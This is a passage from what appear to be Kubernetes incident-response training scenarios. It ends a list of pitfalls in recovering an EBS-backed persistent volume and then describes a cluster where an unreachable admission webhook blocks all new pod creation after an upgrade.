- Deleting and recreating the PV, which may trigger EBS volume deletion if the reclaim policy is Delete
- Creating a new PV pointing to the EBS volume without cleaning up the old PV, causing binding conflicts
- Not setting the reclaim policy to Retain before any recovery operations
- Forcing the StatefulSet to use a new empty PVC, losing the 200 GB of production data

ir-scenario-060 — Kubernetes 🔴¶
After a cluster upgrade, all new pod creations are failing with the error "Internal error occurred: failed calling webhook validate.policy.example.com: Post https://policy-webhook.policy-system:443/validate: dial tcp: connect: connection refused." The validating admission webhook service is down because its pod was evicted during the upgrade and cannot be rescheduled — it has a node affinity rule for a node pool that was drained. Existing pods are running but nothing new can be created in any namespace, including system pods.